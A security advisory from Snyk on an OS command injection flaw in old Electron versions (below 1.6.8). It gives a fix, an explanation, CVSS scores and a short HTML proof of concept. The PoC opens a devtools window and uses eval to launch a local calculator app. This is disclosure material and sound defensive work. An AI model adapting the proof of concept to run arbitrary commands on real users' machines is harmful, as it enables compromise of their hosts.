Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Affecting electron package, versions <1.6.8


Severity

0.0
high
0
10

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.54% (78th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-ELECTRON-6016330
  • published 20 Oct 2023
  • disclosed 17 May 2022
  • credit Luca Carettoni

How to fix?

Upgrade electron to version 1.6.8 or higher.

Overview

electron is a framework which lets you write cross-platform desktop applications using JavaScript, HTML and CSS.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') via the nodeIntegration function. An attacker can execute remote commands by exploiting a precondition that bypasses the Same Origin Policy (SOP). Combining an SOP bypass with a privileged URL internally used by this library, it is possible to execute native Node.js primitives in order to run OS commands on the user's host. Specifically, a chrome-devtools://devtools/bundled/inspector.html window could be used to eval a Node.js child_process.execFile API call.

PoC

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
      <script>
        document.write("Current location:" + window.location.href + "<br>");

        const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
        win.eval("const {shell} = require('electron'); 
        shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

CVSS Scores

version 3.1
Expand this section

Snyk

8.1 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

8.1 high